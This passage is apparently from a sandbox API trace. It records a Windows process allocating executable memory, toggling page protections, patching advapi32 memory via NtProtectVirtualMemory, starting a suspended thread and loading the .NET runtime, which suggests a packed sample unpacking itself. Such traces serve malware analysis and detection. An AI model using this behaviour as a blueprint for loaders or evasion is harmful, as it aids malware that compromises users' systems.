hModule=0x74310000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\system32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0052.997] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 0 [0052.998] CloseHandle (hObject=0x260) returned 1 [0052.998] VirtualAlloc (lpAddress=0xe64000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0053.000] VirtualFree (lpAddress=0xe64000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0053.001] VirtualAlloc (lpAddress=0xe64000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0053.003] VirtualFree (lpAddress=0xe64000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0053.004] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.004] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.004] VirtualAlloc (lpAddress=0xe64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0053.005] VirtualFree (lpAddress=0xe64000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.006] VirtualAlloc (lpAddress=0xe64000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0053.008] VirtualFree (lpAddress=0xe64000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0053.009] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0053.009] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0053.010] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0053.010] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.010] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0053.011] VirtualAlloc (lpAddress=0xe64000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0xe64000 [0053.012] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe63f44, cbMultiByte=11, lpWideCharStr=0x13fed78, cchWideChar=2047 | out: lpWideCharStr="mscoree.dll¾쑹©︈Ŀ") returned 11 [0053.012] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="mscoree.dll", cchWideChar=11, lpMultiByteStr=0x13fed78, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscoree.dll", lpUsedDefaultChar=0x0) returned 11 [0053.013] RtlInitString (in: DestinationString=0x13ffd50, SourceString="_CorExeMain" | out: DestinationString="_CorExeMain") [0053.013] LdrGetProcedureAddress (in: BaseAddress=0x74270000, Name="_CorExeMain", Ordinal=0x0, ProcedureAddress=0x13ffd58 | out: ProcedureAddress=0x13ffd58*=0x74284dc0) returned 0x0 [0053.013] VirtualFree (lpAddress=0xe64000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0053.057] VirtualAlloc (lpAddress=0xe70000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0xe70000 [0053.057] VirtualProtect (in: lpAddress=0xa90000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0x13ffe14 | out: lpflOldProtect=0x13ffe14*=0x2) returned 1 [0053.058] VirtualProtect (in: lpAddress=0xa90000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x13ffe18 | out: lpflOldProtect=0x13ffe18*=0x4) returned 1 [0053.058] VirtualProtect (in: lpAddress=0xa90000, dwSize=0x2000, flNewProtect=0x40, lpflOldProtect=0x13ffe18 | out: lpflOldProtect=0x13ffe18*=0x2) returned 1 [0053.058] VirtualProtect (in: lpAddress=0xa90000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x13ffe18 | out: lpflOldProtect=0x13ffe18*=0x40) returned 1 [0053.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xa9e228, lpParameter=0xe2267c, dwCreationFlags=0x4, lpThreadId=0xe7c0b4 | out: lpThreadId=0xe7c0b4*=0x980) returned 0x260 [0053.059] GetLocalTime (in: lpSystemTime=0x13ffdf0 | out: lpSystemTime=0x13ffdf0*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0x1de)) [0053.059] ResumeThread (hThread=0x260) returned 0x1 [0053.059] SetTimer (hWnd=0x0, nIDEvent=0x1, uElapse=0xcde, lpTimerFunc=0xb9af20) returned 0x7f71 [0053.059] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.059] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.059] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.059] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.060] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.060] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.060] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.060] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffe08, dwLength=0x1c | out: lpBuffer=0x13ffe08*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.061] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c108, cbMultiByte=12, lpWideCharStr=0x13feaa4, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll") returned 12 [0053.061] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x13ffaa8*="ADVAPI32.dll") returned 1 [0053.061] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0053.062] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0053.062] GetLastError () returned 0x0 [0053.062] VirtualFree (lpAddress=0xe80000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.062] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.063] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0053.063] GetModuleFileNameA (in: hModule=0x756e0000, lpFilename=0x13ff990, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.063] GetCurrentProcess () returned 0xffffffff [0053.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b298, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.063] GetCurrentProcess () returned 0xffffffff [0053.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b298, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.063] GetCurrentProcess () returned 0xffffffff [0053.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b2a0, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.063] GetCurrentProcess () returned 0xffffffff [0053.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b2a0, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.063] GetCurrentProcess () returned 0xffffffff [0053.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.064] GetCurrentProcess () returned 0xffffffff [0053.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.064] GetCurrentProcess () returned 0xffffffff [0053.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b01c, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.064] GetCurrentProcess () returned 0xffffffff [0053.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b01c, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.064] GetCurrentProcess () returned 0xffffffff [0053.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b020, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.064] GetCurrentProcess () returned 0xffffffff [0053.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b020, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.065] GetCurrentProcess () returned 0xffffffff [0053.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b02c, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.065] GetCurrentProcess () returned 0xffffffff [0053.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b02c, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.065] GetCurrentProcess () returned 0xffffffff [0053.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b048, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.065] GetCurrentProcess () returned 0xffffffff [0053.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b048, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.065] GetCurrentProcess () returned 0xffffffff [0053.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b074, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.066] GetCurrentProcess () returned 0xffffffff [0053.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b074, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.066] GetCurrentProcess () returned 0xffffffff [0053.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b0d4, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.066] GetCurrentProcess () returned 0xffffffff [0053.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b0d4, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.066] GetCurrentProcess () returned 0xffffffff [0053.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b0fc, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.066] GetCurrentProcess () returned 0xffffffff [0053.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b0fc, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.067] GetCurrentProcess () returned 0xffffffff [0053.067] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b124, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x4, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x2) returned 0x0 [0053.067] GetCurrentProcess () returned 0xffffffff [0053.067] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa94*=0x7574b124, NumberOfBytesToProtect=0x13ffa98, NewAccessProtection=0x2, OldAccessProtection=0x13ffacc | out: BaseAddress=0x13ffa94*=0x7574b000, NumberOfBytesToProtect=0x13ffa98, OldAccessProtection=0x13ffacc*=0x4) returned 0x0 [0053.067] SetLastError (dwErrCode=0x0) [0053.067] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0053.070] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryInfoKeyW") returned 0x756ff270 [0053.071] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyExW") returned 0x756fefd0 [0053.072] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumValueW") returned 0x756ff250 [0053.073] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0053.074] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756fe5a0 [0053.081] SysReAllocStringLen (in: pbstr=0x13ff978*=0x0, psz="mscoreei.dll", len=0xc | out: pbstr=0x13ff978*="mscoreei.dll") returned 1 [0053.081] CharLowerBuffW (in: lpsz="mscoreei.dll", cchLength=0xc | out: lpsz="mscoreei.dll") returned 0xc [0053.081] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", hFile=0x0, dwFlags=0x8) returned 0x74150000 [0053.516] SysReAllocStringLen (in: pbstr=0x13ff510*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13ff510*="kernel32.dll") returned 1 [0053.516] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0053.516] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.519] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0053.521] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0053.523] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0053.525] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0053.527] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7733ebc0 [0053.527] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventExW") returned 0x7733eb20 [0053.527] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreExW") returned 0x7733eb80 [0053.527] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadStackGuarantee") returned 0x772e6700 [0053.527] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolTimer") returned 0x772e6d30 [0053.528] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolTimer") returned 0x779bd7c0 [0053.528] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bb840 [0053.528] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolTimer") returned 0x779bb740 [0053.528] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWait") returned 0x772e6d70 [0053.528] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolWait") returned 0x779bc0b0 [0053.528] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWait") returned 0x779bbe10 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="FlushProcessWriteBuffers") returned 0x779e2b20 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779d8e50 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessorNumber") returned 0x779d52f0 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalProcessorInformation") returned 0x772e71b0 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSymbolicLinkW") returned 0x772e4510 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="SetDefaultDllDirectories") returned 0x74d2d900 [0053.529] GetProcAddress (hModule=0x772d0000, lpProcName="EnumSystemLocalesEx") returned 0x772e49a0 [0053.531] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringEx") returned 0x772e7050 [0053.532] GetProcAddress (hModule=0x772d0000, lpProcName="GetDateFormatEx") returned 0x772e7760 [0053.532] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoEx") returned 0x772e7190 [0053.532] GetProcAddress (hModule=0x772d0000, lpProcName="GetTimeFormatEx") returned 0x772e7780 [0053.532] GetProcAddress (hModule=0x772d0000, lpProcName="GetUserDefaultLocaleName") returned 0x772e72c0 [0053.533] GetProcAddress (hModule=0x772d0000, lpProcName="IsValidLocaleName") returned 0x772e7440 [0053.533] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0053.533] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentPackageId") returned 0x74cbe260 [0053.533] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount64") returned 0x772e0db0 [0053.533] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0053.533] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0053.544] SysReAllocStringLen (in: pbstr=0x13ff45c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x13ff45c*="KERNEL32.DLL") returned 1 [0053.544] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0053.544] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0053.546] GetProcAddress (hModule=0x772d0000, lpProcName="AcquireSRWLockExclusive") returned 0x779b58e0 [0053.548] GetProcAddress (hModule=0x772d0000, lpProcName="ReleaseSRWLockExclusive") returned 0x779b83a0 [0053.549] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c108, cbMultiByte=12, lpWideCharStr=0x13fe44c, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll贰盙ࠀ") returned 12 [0053.549] SysReAllocStringLen (in: pbstr=0x13ff450*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x13ff450*="ADVAPI32.dll") returned 1 [0053.549] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0053.549] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0053.549] GetLastError () returned 0x0 [0053.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.549] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0053.549] GetModuleFileNameA (in: hModule=0x756e0000, lpFilename=0x13ff338, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.549] GetCurrentProcess () returned 0xffffffff [0053.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b298, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.550] GetCurrentProcess () returned 0xffffffff [0053.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b298, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.550] GetCurrentProcess () returned 0xffffffff [0053.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b2a0, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.550] GetCurrentProcess () returned 0xffffffff [0053.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b2a0, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.550] GetCurrentProcess () returned 0xffffffff [0053.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.550] GetCurrentProcess () returned 0xffffffff [0053.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.551] GetCurrentProcess () returned 0xffffffff [0053.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b01c, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.551] GetCurrentProcess () returned 0xffffffff [0053.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 